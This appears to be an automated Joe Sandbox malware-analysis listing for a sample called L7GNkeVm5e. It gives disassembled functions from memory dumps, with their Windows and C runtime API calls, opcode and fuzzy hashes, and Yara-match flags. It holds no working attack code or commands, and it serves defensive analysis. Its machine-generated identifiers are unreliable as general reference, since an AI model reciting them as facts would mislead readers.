                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                                  • String ID: d#D
                                                                                                                                                                                                                                                  • API String ID: 4258476935-2139572230
                                                                                                                                                                                                                                                  • Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                                                                                                                                                                  • Instruction ID: 7ca5177944fb0cce67e66b8a4f56463aec03222bf0f8c457b22845332606d9e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C01A276981605AFDB24BB708D85BAEB35BBF04360F540021E905976C0EBF8EB158ED2
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004321B6
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0043229B
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0043230B
                                                                                                                                                                                                                                                    • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00432314
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00432339
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3864826663-0
                                                                                                                                                                                                                                                  • Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                                                                                                                                                                  • Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02131434
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213144D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213147F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02131488
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02131494
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                                  • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                  • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                  • Instruction ID: 7e15563922c0fd0cae2467e154a28f63ca6e27fd45ca6677f205df6b8d0bb9f0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EB11775A41219AFDB25DF28C884BADB7B6FB08314F1085EAD94DA7350D730AE90CF80
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                  • Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                  • Instruction ID: b84d786a2d304f8d485e6043c67ce007233797ba679a131996904a6fdb599de2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B61F471D40205AFDB22DF68C841B9ABBF7FF05720F2441AAE894EB351D7719941CB94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00433930
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0043394B
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                  • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                                                                                                                                                                  • Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,0212C494,E0830C40,?,?,?,?,?,?,0213424F,0210E032,0212C494,?,0212C494,0212C494,0210E032), ref: 02133B1C
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 02133B97
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 02133BB2
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0212C494,00000001,?,00000005,00000000,00000000), ref: 02133BD8
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,0213424F,00000000,?,?,?,?,?,?,?,?,?,0213424F,0210E032), ref: 02133BF7
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,0210E032,00000001,0213424F,00000000,?,?,?,?,?,?,?,?,?,0213424F,0210E032), ref: 02133C30
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                  • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                                                                                                                                                                  • Instruction ID: 72b877baf42c9e8a91fd7ab500000f0ca2e026c250e636c587f2bae0f4b1ee87
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F51D674D40209AFDB11CFA8D885BEEBBF5EF09700F14416AE965E7391D730A981CBA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004286EB
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00428781
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00428801
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                  • Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02124ABD
                                                                                                                                                                                                                                                    • Part of subcall function 02124D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021247F0), ref: 02124D9C
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02124AD2
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02124AE1
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02124AEF
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02124B65
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02124BA5
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02124BB3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3151764488-0
                                                                                                                                                                                                                                                  • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                                  • Instruction ID: cd2a87ea47cb6514a711c09ec5952f676b90f0cb4fcf9e83abfece644a27dcba
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE310835A402249FCF14EF68C884B6D73BAFF44710F244565F816AB285DB70EA29CB94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                  • Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                  • Instruction ID: 886605b2d476a4344b8d3c51c71cf270481fe26b3c850c9c23addf976bb98927
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A911E97298412DBFDB262F769C08D6B7A6FFF82B31B110664FC15D7250DB319911CAA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A3C1
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A3CC
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A3D7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A42B
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A436
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A441
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A44C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                  • Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0213A321: _free.LIBCMT ref: 0213A34A
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A628
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A633
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A63E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A692
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A69D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A6A8
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A6B3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                  • Instruction ID: 95a5d0576e5239dce8b1f14ac93f15e97e2178c557356555c4524f3841933a6d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0111CEB1981B04BEDE22BBB1CD45FCB779FEF05700F804825A2E9A6160DB65F6148E94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
                                                                                                                                                                                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412463
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4227777306-0
                                                                                                                                                                                                                                                  • Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                                                                                                                                                                  • Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 02112657
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 0211265D
                                                                                                                                                                                                                                                  • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 0211268A
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 02112694
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110D90,?,?,?,00000000), ref: 021126A6
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021126BC
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021126CA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4227777306-0
                                                                                                                                                                                                                                                  • Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                                                                                                                                                                  • Instruction ID: e44a0fdabbb470493dd86413d3e395119676a6d187df121367f299fab4d0427f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8018F39681125AEDB24BF65EC48BAF3768AF42B52B600435FD15D3190DB74D904CAE8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021166FB), ref: 021124A6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021124B4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021124C2
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021166FB), ref: 021124F0
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 021124F7
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,021166FB), ref: 02112512
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,021166FB), ref: 0211251E
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112534
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02112542
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                  • String ID: kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                  • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
